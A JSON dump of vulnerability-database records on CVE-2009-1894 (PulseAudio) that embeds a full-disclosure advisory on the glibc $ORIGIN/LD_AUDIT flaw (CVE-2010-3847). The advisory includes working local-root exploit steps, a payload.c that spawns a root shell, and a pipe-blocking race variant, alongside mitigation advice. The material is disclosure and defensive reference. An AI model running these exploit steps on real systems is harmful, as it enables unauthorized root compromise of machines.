"modified": "2009-07-18T12:18:19", "id": "DEBIAN:DSA-1838-1:2C084", "href": "https://lists.debian.org/debian-security-announce/2009/msg00152.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-09-23T06:31:56", "description": "### Background\n\nPulseAudio is a network-enabled sound server with an advanced plug-in system. 
\n\n### Description\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself. The vulnerability has independently been reported to oCERT by Yorick Koster. \n\n### Impact\n\nA local user who has write access to any directory on the file system containing /usr/bin can exploit this vulnerability using a race condition to execute arbitrary code with root privileges. \n\n### Workaround\n\nEnsure that the file system holding /usr/bin does not contain directories that are writable for unprivileged users. \n\n### Resolution\n\nAll PulseAudio users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/pulseaudio-0.9.9-r54\"", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "gentoo", "title": "PulseAudio: Local privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-16T00:00:00", "id": "GLSA-200907-13", "href": "https://security.gentoo.org/glsa/200907-13", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-09-01T10:04:57", "description": "## Releases\n\n * Ubuntu 9.04 \n * Ubuntu 8.10 \n * Ubuntu 8.04 \n\n## Packages\n\n * pulseaudio \\- \n\nTavis Ormandy, Julien Tinnes, and Yorick Koster discovered that PulseAudio did not \nsafely re-execute itself. 
A local attacker could exploit this to gain \nroot privileges.\n", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "ubuntu", "title": "PulseAudio vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-16T00:00:00", "id": "USN-804-1", "href": "https://ubuntu.com/security/notices/USN-804-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-08-10T07:05:22", "description": "\nTavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\n\nThe old stable distribution (etch) is not affected by this issue.\n\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\n\nWe recommend that you upgrade your pulseaudio packages.\n\n\n", "cvss3": {}, "published": "2009-07-18T00:00:00", "type": "osv", "title": "pulseaudio - privilege escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2022-08-10T07:05:20", "id": "OSV:DSA-1838-1", "href": "https://osv.dev/vulnerability/DSA-1838-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:43:01", "description": "BUGTRAQ ID: 35724\r\nCVE(CAN) ID: CVE-2009-1894\r\n\r\nThe Linux Kernel is the kernel used by the open-source operating system Linux.\r\n\r\nThe tun_chr_poll() function in the drivers/net/tun.c file of the Linux Kernel contains a NULL pointer dereference error:\r\n\r\n int fd;\r\n struct pollfd pfd;\r\n fd = open("/dev/net/tun", O_RDWR);\r\n pfd.fd = fd;\r\n pfd.events = POLLIN | POLLOUT;\r\n poll(&pfd, 1, 0);\r\n\r\nIf a user performs open() and poll() operations on the tun device, this vulnerability can be triggered, causing a crash or the execution of arbitrary instructions with root privileges. A successful attack requires that the kernel was compiled with GCC's -fdelete-null-pointer-checks optimization.\n\nLinux kernel 2.6.30\nVendor patch:\r\n\r\nLinux\r\n-----\r\nThe vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:\r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=3c8a9c63d5fd738c261bd0ceece04d9c8357ca13", "cvss3": {}, "published": "2009-07-20T00:00:00", "type": "seebug", "title": "Linux Kernel tun_chr_pool() function NULL pointer dereference vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11842", "id": "SSV:11842", "sourceData": "", 
"sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:37:59", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "GNU C library dynamic linker $ORIGIN expansion Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70027", "id": "SSV:70027", "sourceData": "\n from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\r\n\r\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\r\n------------------------------------------------------------------------------\r\n\r\nGruezi, This is CVE-2010-3847.\r\n\r\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\r\ndynamically linked programs. ld.so operates in two security modes, a permissive\r\nmode that allows a high degree of control over the load operation, and a secure\r\nmode (libc_enable_secure) intended to prevent users from interfering with the\r\nloading of privileged executables.\r\n\r\n$ORIGIN is an ELF substitution sequence representing the location of the\r\nexecutable being loaded in the filesystem hierarchy. 
The intention is to allow\r\nexecutables to specify a search path for libraries that is relative to their\r\nlocation, to simplify packaging without spamming the standard search paths with\r\nsingle-use libraries.\r\n\r\nNote that despite the confusing naming convention, $ORIGIN is specified in a\r\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\r\nenvironment (developers would normally use the -rpath ld parameter, or\r\n-Wl,-rpath,$ORIGIN via the compiler driver).\r\n\r\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\r\nbinaries,\r\n\r\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\r\n\r\n"For security, the dynamic linker does not allow use of $ORIGIN substitution\r\n sequences for set-user and set-group ID programs. For such sequences that\r\n appear within strings specified by DT_RUNPATH dynamic array entries, the\r\n specific search path containing the $ORIGIN sequence is ignored (though other\r\n search paths in the same string are processed). $ORIGIN sequences within a\r\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\r\n errors. The same restrictions may be applied to processes that have more than\r\n minimal privileges on systems with installed extended security mechanisms."\r\n\r\nHowever, glibc ignores this recommendation. The attack the ELF designers were\r\nlikely concerned about is users creating hardlinks to suid executables in\r\ndirectories they control and then executing them, thus controlling the\r\nexpansion of $ORIGIN.\r\n\r\nIt is tough to form a thorough complaint about this glibc behaviour however,\r\nas any developer who believes they're smart enough to safely create suid\r\nprograms should be smart enough to understand the implications of $ORIGIN\r\nand hard links on load behaviour. 
The glibc maintainers are some of the\r\nsmartest guys in free software, and well known for having a "no hand-holding"\r\nstance on various issues, so I suspect they wanted a better argument than this\r\nfor modifying the behaviour (I pointed it out a few years ago, but there was\r\nlittle interest).\r\n\r\nHowever, I have now discovered a way to exploit this. The origin expansion\r\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\r\nto prevent it from working, it is insufficient.\r\n\r\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\r\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\r\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\r\n\r\nThe codepath that triggers this expansion is\r\n\r\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\r\n\r\n(in the code below DST is dynamic string token)\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\r\n\r\n 741 /* Expand DSTs. */\r\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 743 if (__builtin_expect (cnt == 0, 1))\r\n 744 llp_tmp = strdupa (llp);\r\n 745 else\r\n 746 {\r\n 747 /* Determine the length of the substituted string. */\r\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 749\r\n 750 /* Allocate the necessary memory. 
*/\r\n 751 llp_tmp = (char *) alloca (total + 1);\r\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 753 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\r\n\r\n 253 if (__builtin_expect (*name == '$', 0))\r\n 254 {\r\n 255 const char *repl = NULL;\r\n 256 size_t len;\r\n 257\r\n 258 ++name;\r\n 259 if ((len = is_dst (start, name, "ORIGIN", is_path,\r\n 260 INTUSE(__libc_enable_secure))) != 0)\r\n 261 {\r\n ...\r\n 267 repl = l->l_origin;\r\n 268 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\r\n\r\n\r\n 202 if (__builtin_expect (secure, 0)\r\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\r\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\r\n 205 return 0;\r\n 206\r\n 207 return len;\r\n 208 }\r\n\r\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\r\nThis makes little sense, and does not appear to be useful even if there were\r\nno security impact. This was most likely the result of an attempt to re-use the\r\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\r\nintroducing this error.\r\n\r\nPerhaps surprisingly, this error is exploitable.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least the following versions have been tested\r\n\r\n 2.12.1, FC13\r\n 2.5, RHEL5 / CentOS5\r\n\r\nOther versions are probably affected, possibly via different vectors. I'm aware\r\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\r\ndo not know if it's possible to avoid this.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIt is possible to exploit this flaw to execute arbitrary code as root.\r\n\r\nPlease note, this is a low impact vulnerability that is only of interest to\r\nsecurity professionals and system administrators. 
End users do not need\r\nto be concerned.\r\n\r\nExploitation would look like the following.\r\n\r\n# Create a directory in /tmp we can control.\r\n$ mkdir /tmp/exploit\r\n\r\n# Link to an suid binary, thus changing the definition of $ORIGIN.\r\n$ ln /bin/ping /tmp/exploit/target\r\n\r\n# Open a file descriptor to the target binary (note: some users are surprised\r\n# to learn exec can be used to manipulate the redirections of the current\r\n# shell if a command is not specified. This is what is happening below).\r\n$ exec 3< /tmp/exploit/target\r\n\r\n# This descriptor should now be accessible via /proc.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\r\n\r\n# Remove the directory previously created\r\n$ rm -rf /tmp/exploit/\r\n\r\n# The /proc link should still exist, but now will be marked deleted.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\r\n\r\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\r\n$ cat > payload.c\r\nvoid __attribute__((constructor)) init()\r\n{\r\n setuid(0);\r\n system("/bin/bash");\r\n}\r\n^D\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n$ ls -l /tmp/exploit\r\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\r\n\r\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\r\n$ LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/3\r\nsh-4.1# whoami\r\nroot\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIt is a good idea to prevent users from creating files on filesystems mounted\r\nwithout nosuid. 
The following interesting solution for administrators who\r\ncannot modify their partitioning scheme was suggested to me by Rob Holland\r\n(@robholland):\r\n\r\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\r\nfor example:\r\n\r\n# mount -o bind /tmp /tmp\r\n# mount -o remount,bind,nosuid /tmp /tmp\r\n\r\nBe aware of race conditions at boot via crond/atd/etc, and users with\r\nreferences to existing directories (man lsof), but this may be an acceptable\r\nworkaround until a patch is ready for deployment.\r\n\r\n(Of course you need to do this everywhere untrusted users can make links to\r\nsuid/sgid binaries. find(1) is your friend).\r\n\r\nIf someone wants to create an init script that would automate this at boot for\r\ntheir distribution, I'm sure it would be appreciated by other administrators.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMajor distributions should be releasing updated glibc packages shortly.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\r\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\r\nand all my other elite friends and colleagues.\r\n\r\nAdditional greetz to the openwall guys who saw this problem coming years ago.\r\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\r\ntheir insight into systems security.\r\n\r\nhttp://www.openwall.com/owl/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nThere are several known techniques to exploit dynamic loader bugs for suid\r\nbinaries, the fexecve() technique listed in the Consequences section above is a\r\nmodern technique, making use of relatively recent Linux kernel features (it was\r\nfirst suggested to me by Adam Langley while discussing 
CVE-2009-1894, but I\r\nbelieve Gabriel Campana came up with the same solution independently).\r\n\r\nThe classic UNIX technique is a little less elegant, but has the advantage that\r\nread access is not required for the target binary. It is rather common for\r\nadministrators to remove read access from suid binaries in order to make\r\nattackers work a little harder, so I will document it here for reference.\r\n\r\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\r\nbytes capacity on Linux, see the section on "Pipe Capacity" in pipe(7) from the\r\nLinux Programmer's Manual), then dup2() it to stderr. Following the dup2(),\r\nanything written to stderr will block, so you simply execve() and then make the\r\nloader print some error message, allowing you to reliably win any race\r\ncondition.\r\n\r\nLD_DEBUG has always been a good candidate for getting error messages on\r\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\r\nsome minor complaints about information leaks, but it can still be used with a\r\nslight modification (I first learned of this technique from a bugtraq posting\r\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\r\n\r\nThe exploit flow for this alternative attack is a little more complicated, but\r\nwe can still use the shell to do it (this session is from an FC13 system,\r\noutput cleaned up for clarity).\r\n\r\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\r\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\\$ORIGIN" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\r\n[1] 26926\r\n\r\n# Now ld.so is blocked on write() in the background trying to say "invalid\r\n# debug option", so we are free to manipulate the filesystem.\r\n$ rm -rf /tmp/exploit/\r\n\r\n# Put exploit payload in place.\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n\r\n# Clear the pipe by killing sleep, letting cat drain the contents. 
This will\r\n# unblock the target, allowing it to continue.\r\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\r\n-bash: line 99: 26929 Terminated sleep 1h\r\n\r\n# And now we can take control of a root shell :-)\r\n$ fg\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\r\nwhile the loader is trying to map lots of memory, you have a good chance of\r\nwinning any race. I previously found an integer overflow in this feature and\r\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\r\nmaintainers disagreed and just fixed the overflow.\r\n\r\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\r\n\r\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\r\nnext big loader bug is going to be, it's just not safe to let attackers have\r\nthat much control over the execution environment of privileged programs.\r\n\r\nFinally, some notes on ELF security for newcomers. The following common\r\nconditions are usually exploitable:\r\n\r\n - An empty DT_RPATH, i.e. -Wl,-rpath,""\r\n This is a surprisingly common build error, due to variable expansion\r\n failing during the build process.\r\n - A relative, rather than absolute DT_RPATH.\r\n For example, -Wl,-rpath,"lib/foo".\r\n\r\nI'll leave it as an exercise for the interested reader to explain why. Remember\r\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\r\nfor their dependencies, and so on.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\r\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\r\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\r\n- Linkers and Loaders, John R. 
Levine, ISBN 1-55860-496-0.\r\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\r\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\r\n\r\nYou should subscribe to Linux Weekly News and help support their high standard\r\nof security journalism.\r\n\r\nhttp://lwn.net/\r\n\r\nI have a twitter account where I occasionally comment on security topics.\r\n\r\nhttp://twitter.com/taviso\r\n\r\nex$$\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70027", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2023-09-23T03:19:48", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T16:30:00", "type": "cve", "title": "CVE-2009-1894", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2023-02-13T01:17:00", "cpe": ["cpe:/a:pulseaudio:pulseaudio:0.9.9", "cpe:/a:pulseaudio:pulseaudio:0.9.10", "cpe:/a:pulseaudio:pulseaudio:0.9.14"], "id": "CVE-2009-1894", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1894", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:pulseaudio:pulseaudio:0.9.10:*:*:*:*:*:*:*", "cpe:2.3:a:pulseaudio:pulseaudio:0.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:pulseaudio:pulseaudio:0.9.14:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-09-25T06:49:59", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T16:30:00", "type": "debiancve", "title": "CVE-2009-1894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-17T16:30:00", "id": "DEBIANCVE:CVE-2009-1894", "href": "https://security-tracker.debian.org/tracker/CVE-2009-1894", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:55", "description": "", "cvss3": {}, "published": "2010-10-19T00:00:00", "type": "packetstorm", "title": "GNU C Library Dynamic Linker $ORIGIN Expansion Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-19T00:00:00", "id": "PACKETSTORM:94955", "href": "https://packetstormsecurity.com/files/94955/GNU-C-Library-Dynamic-Linker-ORIGIN-Expansion-Vulnerability.html", "sourceData": "`The GNU C library dynamic linker expands $ORIGIN in setuid library search path 
\n------------------------------------------------------------------------------ \n \nGruezi, This is CVE-2010-3847. \n \nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of \ndynamically linked programs. ld.so operates in two security modes, a permissive \nmode that allows a high degree of control over the load operation, and a secure \nmode (libc_enable_secure) intended to prevent users from interfering with the \nloading of privileged executables. \n \n$ORIGIN is an ELF substitution sequence representing the location of the \nexecutable being loaded in the filesystem hierarchy. The intention is to allow \nexecutables to specify a search path for libraries that is relative to their \nlocation, to simplify packaging without spamming the standard search paths with \nsingle-use libraries. \n \nNote that despite the confusing naming convention, $ORIGIN is specified in a \nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the \nenvironment (developers would normally use the -rpath ld parameter, or \n-Wl,-rpath,$ORIGIN via the compiler driver). \n \nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID \nbinaries, \n \nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution \n \n\"For security, the dynamic linker does not allow use of $ORIGIN substitution \nsequences for set-user and set-group ID programs. For such sequences that \nappear within strings specified by DT_RUNPATH dynamic array entries, the \nspecific search path containing the $ORIGIN sequence is ignored (though other \nsearch paths in the same string are processed). $ORIGIN sequences within a \nDT_NEEDED entry or path passed as a parameter to dlopen() are treated as \nerrors. The same restrictions may be applied to processes that have more than \nminimal privileges on systems with installed extended security mechanisms.\" \n \nHowever, glibc ignores this recommendation. 
The attack the ELF designers were \nlikely concerned about is users creating hardlinks to suid executables in \ndirectories they control and then executing them, thus controlling the \nexpansion of $ORIGIN. \n \nIt is tough to form a thorough complaint about this glibc behaviour however, \nas any developer who believes they're smart enough to safely create suid \nprograms should be smart enough to understand the implications of $ORIGIN \nand hard links on load behaviour. The glibc maintainers are some of the \nsmartest guys in free software, and well known for having a \"no hand-holding\" \nstance on various issues, so I suspect they wanted a better argument than this \nfor modifying the behaviour (I pointed it out a few years ago, but there was \nlittle interest). \n \nHowever, I have now discovered a way to exploit this. The origin expansion \nmechanism is recycled for use in LD_AUDIT support, although an attempt is made \nto prevent it from working, it is insufficient. \n \nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit \nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does. \nHowever, $ORIGIN expansion is only prevented if it is not used in isolation. \n \nThe codepath that triggers this expansion is \n \n_dl_init_paths() -> _dl_dst_substitute() -> _is_dst() \n \n(in the code below DST is dynamic string token) \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741 \n \n741 /* Expand DSTs. */ \n742 size_t cnt = DL_DST_COUNT (llp, 1); \n743 if (__builtin_expect (cnt == 0, 1)) \n744 llp_tmp = strdupa (llp); \n745 else \n746 { \n747 /* Determine the length of the substituted string. */ \n748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt); \n749 \n750 /* Allocate the necessary memory. 
*/ \n751 llp_tmp = (char *) alloca (total + 1); \n752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1); \n753 } \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245 \n \n253 if (__builtin_expect (*name == '$', 0)) \n254 { \n255 const char *repl = NULL; \n256 size_t len; \n257 \n258 ++name; \n259 if ((len = is_dst (start, name, \"ORIGIN\", is_path, \n260 INTUSE(__libc_enable_secure))) != 0) \n261 { \n... \n267 repl = l->l_origin; \n268 } \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171 \n \n \n202 if (__builtin_expect (secure, 0) \n203 && ((name[len] != '\\0' && (!is_path || name[len] != ':')) \n204 || (name != start + 1 && (!is_path || name[-2] != ':')))) \n205 return 0; \n206 \n207 return len; \n208 } \n \nAs you can see, $ORIGIN is only expanded if it is alone and first in the path. \nThis makes little sense, and does not appear to be useful even if there were \nno security impact. This was most likely the result of an attempt to re-use the \nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally \nintroducing this error. \n \nPerhaps surprisingly, this error is exploitable. \n \n-------------------- \nAffected Software \n------------------------ \n \nAt least the following versions have been tested \n \n2.12.1, FC13 \n2.5, RHEL5 / CentOS5 \n \nOther versions are probably affected, possibly via different vectors. I'm aware \nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I \ndo not know if it's possible to avoid this. \n \n-------------------- \nConsequences \n----------------------- \n \nIt is possible to exploit this flaw to execute arbitrary code as root. \n \nPlease note, this is a low impact vulnerability that is only of interest to \nsecurity professionals and system administrators. End users do not need \nto be concerned. 
\n \nExploitation would look like the following. \n \n# Create a directory in /tmp we can control. \n$ mkdir /tmp/exploit \n \n# Link to an suid binary, thus changing the definition of $ORIGIN. \n$ ln /bin/ping /tmp/exploit/target \n \n# Open a file descriptor to the target binary (note: some users are surprised \n# to learn exec can be used to manipulate the redirections of the current \n# shell if a command is not specified. This is what is happening below). \n$ exec 3< /tmp/exploit/target \n \n# This descriptor should now be accessible via /proc. \n$ ls -l /proc/$$/fd/3 \nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target* \n \n# Remove the directory previously created \n$ rm -rf /tmp/exploit/ \n \n# The /proc link should still exist, but now will be marked deleted. \n$ ls -l /proc/$$/fd/3 \nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted) \n \n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen(). \n$ cat > payload.c \nvoid __attribute__((constructor)) init() \n{ \nsetuid(0); \nsystem(\"/bin/bash\"); \n} \n^D \n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c \n$ ls -l /tmp/exploit \n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit* \n \n# Now force the link in /proc to load $ORIGIN via LD_AUDIT. \n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3 \nsh-4.1# whoami \nroot \nsh-4.1# id \nuid=0(root) gid=500(taviso) \n \n------------------- \nMitigation \n----------------------- \n \nIt is a good idea to prevent users from creating files on filesystems mounted \nwithout nosuid. 
